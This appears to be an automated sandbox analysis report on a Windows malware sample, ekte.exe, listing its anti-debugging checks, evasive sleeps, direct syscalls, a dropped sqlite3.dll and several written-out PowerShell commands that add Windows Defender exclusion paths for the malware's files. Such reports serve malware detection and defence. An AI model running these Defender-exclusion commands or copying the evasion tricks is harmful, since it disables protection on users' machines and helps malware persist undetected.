Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 1B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 2890000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 8980000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 9980000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 9B80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: AB80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 2330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 550000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 6D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 7D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 7ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 8ED0000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A00101 rdtsc 8_2_00A00101
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ekte.exe Window / User API: threadDelayed 3610 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Window / User API: threadDelayed 1842 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1124 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2092 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1635 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1269 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Window / User API: threadDelayed 2429 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Window / User API: threadDelayed 2434 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1752
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1740
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2029
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1034
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 9747 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\findstr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\findstr.exe API coverage: 1.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe TID: 3724 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe TID: 3420 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep count: 1124 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep count: 2092 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3860 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -20291418481080494s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3164 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3880 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep count: 212 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep time: -424000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 1332 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep count: 9747 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 2088 Thread sleep time: -19494000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe TID: 2244 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E183F0 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register, 19_2_61E183F0
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ekte.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A00101 rdtsc 8_2_00A00101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk, 8_2_009B07AC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009A0080 mov ecx, dword ptr fs:[00000030h] 8_2_009A0080
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009A00EA mov eax, dword ptr fs:[00000030h] 8_2_009A00EA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C26F8 mov eax, dword ptr fs:[00000030h] 8_2_009C26F8
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateUserProcess: Direct from: 0x774D093E Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateKey: Direct from: 0x774CFB62
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQuerySystemInformation: Direct from: 0x774D20DE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtWriteVirtualMemory: Direct from: 0x774D213E Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateFile: Direct from: 0x774D00D6
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetTimer: Direct from: 0x774D021A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenFile: Direct from: 0x774CFD86
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationThread: Direct from: 0x774E9893
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenKeyEx: Direct from: 0x774CFA4A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtResumeThread: Direct from: 0x774D008D
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenKeyEx: Direct from: 0x774D103A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2 Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtDelayExecution: Direct from: 0x774CFDA1
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationProcess: Direct from: 0x774CFB4A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationThread: Direct from: 0x774CF9CE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtReadFile: Direct from: 0x774CF915
